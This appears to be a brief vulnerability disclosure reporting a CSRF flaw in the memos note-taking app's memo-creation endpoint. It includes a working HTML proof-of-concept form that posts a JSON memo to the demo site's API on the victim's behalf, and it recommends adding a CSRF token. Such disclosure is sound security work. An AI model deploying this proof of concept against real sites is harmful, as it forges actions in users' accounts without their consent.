An attacker can add any user thoughts via a CSRF attack
When you send a link to the victim and click on it, any thoughts will be added
1- When the attacker adds any thoughts, it then intercepts the request
2- Take this request to generate a CSRF PoC
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://demo.usememos.com/api/memo" method="POST" enctype="text/plain">
<input type="hidden" name="{"content":"Test CSRF","visibility":"PRIVATE","resourceIdList":[]}" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
https://drive.google.com/file/d/11Hec1H-61UpoOLVi55uWRpLBUMLVjRbi/view?usp=share_link
Add CSRF Token
https://www.freecodecamp.org/news/csrf-protection-problem-and-how-to-fix-it